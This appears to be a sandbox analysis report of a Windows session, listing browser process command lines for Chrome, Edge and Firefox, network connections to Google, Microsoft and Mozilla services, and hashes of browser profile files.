"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb3ee9ab58,0x7ffb3ee9ab68,0x7ffb3ee9ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1600 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2104 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2924 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2944 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4024 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3176 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4408 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4520 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4068 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4376 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4672 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4836 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4956 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3176 --field-trial-handle=1828,i,5043810634361480549,7504200120937851763,131072 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb3ed43cb8,0x7ffb3ed43cc8,0x7ffb3ed43cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,15591890884155497281,5591132700474040761,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1964 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,15591890884155497281,5591132700474040761,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1944,15591890884155497281,5591132700474040761,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2520 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15591890884155497281,5591132700474040761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,15591890884155497281,5591132700474040761,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb3ee9ab58,0x7ffb3ee9ab68,0x7ffb3ee9ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1616 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1984 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2112 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3064 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3184 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3832 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4412 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4484 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4608 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3968 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4744 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4420 --field-trial-handle=1836,i,11539899144891585880,18020963597589299759,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x7ff7816dae48,0x7ff7816dae58,0x7ff7816dae68

C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level

C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0x7ff7816dae48,0x7ff7816dae58,0x7ff7816dae68

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="488.0.520122527\8313714" -parentBuildID 20230214051806 -prefsHandle 1800 -prefMapHandle 1792 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {31cb6627-8154-42e2-9e96-ee935a984fee} 488 "\\.\pipe\gecko-crash-server-pipe.488" 1880 209919e6858 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="488.1.317736062\1917083982" -parentBuildID 20230214051806 -prefsHandle 2392 -prefMapHandle 2388 -prefsLen 22110 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a95f4b95-8a35-40b5-9fd9-0b4645be467e} 488 "\\.\pipe\gecko-crash-server-pipe.488" 2404 20985c88458 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="488.2.1767426331\359570481" -childID 1 -isForBrowser -prefsHandle 2900 -prefMapHandle 3036 -prefsLen 22148 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {734fbbc1-eb31-4c65-9ace-532cf7b51b06} 488 "\\.\pipe\gecko-crash-server-pipe.488" 2924 209952e6b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="488.3.322403414\1449851957" -childID 2 -isForBrowser -prefsHandle 3600 -prefMapHandle 3596 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f56b669a-d7fb-4440-b416-9f3cc639b6ce} 488 "\\.\pipe\gecko-crash-server-pipe.488" 924 20985c3ee58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="488.4.1359314841\1382869316" -childID 3 -isForBrowser -prefsHandle 5148 -prefMapHandle 5144 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {755abd04-df0e-493a-8897-356cb400fe41} 488 "\\.\pipe\gecko-crash-server-pipe.488" 5104 2099ac44b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="488.5.640477228\285920231" -childID 4 -isForBrowser -prefsHandle 5100 -prefMapHandle 5128 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c1865371-cacd-4d41-a6ed-464c9754b1d8} 488 "\\.\pipe\gecko-crash-server-pipe.488" 5292 2099ac41858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="488.6.1030590432\1354527057" -childID 5 -isForBrowser -prefsHandle 5556 -prefMapHandle 5552 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {609cfc88-5a71-46ef-8377-e46ed8df502a} 488 "\\.\pipe\gecko-crash-server-pipe.488" 5564 2099ac41b58 tab

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc

Network

Country Destination Domain Proto
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 106.201.58.216.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.206:443 apis.google.com tcp
GB 142.250.200.46:443 play.google.com tcp
GB 2.16.34.114:443 tcp
JP 40.79.189.58:443 browser.pipe.aria.microsoft.com tcp
NL 23.62.61.194:443 r.bing.com tcp
NL 23.62.61.194:443 r.bing.com tcp
NL 23.62.61.194:443 r.bing.com tcp
NL 23.62.61.194:443 r.bing.com tcp
NL 23.62.61.194:443 r.bing.com tcp
NL 23.62.61.194:443 r.bing.com tcp
US 8.8.8.8:53 58.189.79.40.in-addr.arpa udp
US 52.111.227.11:443 tcp
US 152.199.19.161:443 fp-vs-nocache.azureedge.net tcp
US 13.107.237.254:443 t-ring-fdv2.msedge.net tcp
US 52.113.196.254:443 teams-ring.msedge.net tcp
US 13.107.246.254:443 t-ring-s.msedge.net tcp
US 13.107.237.254:443 t-ring-fdv2.msedge.net tcp
BR 191.233.176.51:443 f430b3b3df61d1b61ef63ea49a747285.azr.footprintdns.com tcp
US 150.171.42.254:443 spo-ring-fallback.msedge.net tcp
US 13.107.128.254:443 exo-ring.msedge.net tcp
US 52.123.128.254:443 dual-s-ring.msedge.net tcp
US 150.171.28.254:443 ax-ring.msedge.net tcp
GB 142.250.187.196:443 www.google.com udp
US 13.107.4.254:443 a36cc4ee839d436e49d455cc07ddab9c.clo.footprintdns.com tcp
US 172.202.64.254:443 arc-ring.msedge.net tcp
US 104.214.71.38:443 63dbbe730550f468f69146f25c9bb8d0.azr.footprintdns.com tcp
GB 142.250.200.46:443 play.google.com udp
US 8.8.8.8:53 254.4.107.13.in-addr.arpa udp
US 8.8.8.8:53 38.71.214.104.in-addr.arpa udp
GB 216.58.213.14:443 clients2.google.com tcp
N/A 127.0.0.1:50346 tcp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 34.117.188.166:443 contile.services.mozilla.com tcp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 34.117.188.166:443 contile.services.mozilla.com tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 8.8.8.8:53 push.services.mozilla.com udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 52.25.179.107:443 shavar.services.mozilla.com tcp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 34.117.188.166:443 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 34.117.188.166:443 prod.ads.prod.webservices.mozgcp.net udp
US 34.107.243.93:443 autopush.prod.mozaws.net udp
N/A 127.0.0.1:50352 tcp
US 13.107.237.254:443 t-ring-fdv2.msedge.net tcp
GB 2.16.34.114:443 tcp
US 52.113.196.254:443 teams-ring.msedge.net tcp
US 4.150.241.254:443 arm-ring.msedge.net tcp

Files

\??\pipe\crashpad_5032_DFVEYBQNTCMSMXNR

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 7d2ff15da641709da31a9a199200bddf
SHA1 e02951a84b88008e3dfedb74c3491f54c03c872c
SHA256 99df110a196949e1da6b9df7e46396044c517ca8f2f5d064ac00f878c9ce3685
SHA512 744422ce4680524ac4e39021f0d738306738493825ccb5d28159f8356b51aca514f1d7d6f9a22dd26962b14b35623885a577b24b0f9d1c4b2a9fa0b60f1cc5f2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 cca9f29431bb62f2af9073b661e87131
SHA1 8c753e2194d5ed19686eba9abedc5b297ffb4b5c
SHA256 0b2a5cbcdfcdfeaaad7e5db6f84f61d14fbd02ab64dfff9cf041e9a1f40d1353
SHA512 00cc4fa6c928ff7fbe2e7a82c5e97d290dc4eb63033cf084c361663e9b1c9a6e83dfaf132520d27b4c55457855b2b47df9f751ae0739ec9c64612b00e5bc48c8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 1370b53ef6a5964033200d6b80c9b17c
SHA1 2b97d5659230c006075f7bca12590fba4e85431b
SHA256 7c5e9f5b0a37bc21a07396edc1e5b0cffbe08c8bb52d2eb634cf65496ee9d398
SHA512 b96fc1c50280859b5575c47be85b865ae016da0d919e7503954ab9cad11b7824775f9dbf7f3e9b01f3cebea66fe10f52082ca7872db93ad762d104148dd992e3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 6636bcd92bd706b5d56c005ae1f93c70
SHA1 422ee3f2c38e738ed5ad128f5a6da9f1a5bec123
SHA256 87b0b39ed272049118ab23acbc1d6b78c1898535114e4fb04e143b8098b4ec53
SHA512 46c9d077d62443863d89e8ffe6649095b806cdbc776e0a2d3ed203a5bdf4413c57520bea935acf1aa0fe7d2ed81f94b8edd0215663411ba026be726c1c3b19a7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 fae96ff81f0d03a793cbe68753f4f2e9
SHA1 77d0ccb551fd22fc78726fe2004ee23a55ebd63a
SHA256 8dae041e17139ce632a05c488a4cea819ecad98a20190c84ff8857611cf1ad26
SHA512 af9a1c3d87de15fb4956e3e4fbb680518c2eb117ff7ace25143f4f301155ccc42997c47a4c29dd784ee775e47b35cfc876c09cc9ea0e9045674901176bc92635

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 c5a982ad8e7792292beaaf1758349412
SHA1 6fa645306190f8c76b28df5164c5fb5ede193ce3
SHA256 84a904a466cabf3504fab0d6e18c597f46bf0dbf553fdc872b224d2f863816a8
SHA512 e294c42d98d747060f882099ca44d0851857c28cb599983fe5ec6ff6428ed3ebb36ebb7d602c2ba26fd3d5140fad83912f5605088fb642cd84dc8d33d7c61838

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 d6f7f14e87d8cb4d879e8cc046e7e77f
SHA1 d9cbaf32fea205e70818a1042525d0c4cda3b852
SHA256 0e6f02e7d3d1dae0507bd28c0b028361835019ca146244d52e5f552208dddf89
SHA512 1e2c548c8e554acbe722352e1868789bcac46575ca6fc1a62b19ae098bb3655b11e2aab478bb920069fe5c6bbf9ae72a5b8afe65c0c5a468d48258d1484fef42

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

MD5 b3f0aef15fb12b55369415e333f91b16
SHA1 c1769cb48674a74ebd2af3e30177e82e95622656
SHA256 7f894d37cbc26679cf2a2c6d78521cedcd9c5d9927a53e288f360c1defd35ad9
SHA512 dc9effac55d271b19675f49038c5508806d22be9c560cd2973e0c34c82e4506c5cab0e9f46be94e427184671cdef0f97e58b9bf06c6fa6216a449bdb2d244b2e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 c1c7e2f451eb3836d23007799bc21d5f
SHA1 11a25f6055210aa7f99d77346b0d4f1dc123ce79
SHA256 429a870d582c77c8a661c8cc3f4afa424ed5faf64ce722f51a6a74f66b21c800
SHA512 2ca40bbbe76488dff4b10cca78a81ecf2e97d75cd65f301da4414d93e08e33f231171d455b0dbf012b2d4735428e835bf3631f678f0ab203383e315da2d23a34

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6876cbd342d4d6b236f44f52c50f780f
SHA1 a215cf6a499bfb67a3266d211844ec4c82128d83
SHA256 ca5a6320d94ee74db11e55893a42a52c56c8f067cba35594d507b593d993451e
SHA512 dff3675753b6b733ffa2da73d28a250a52ab29620935960673d77fe2f90d37a273c8c6afdf87db959bdb49f31b69b41f7aa4febac5bbdd43a9706a4dd9705039

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 aee73f5d9cfdd63e2327def80fb00276
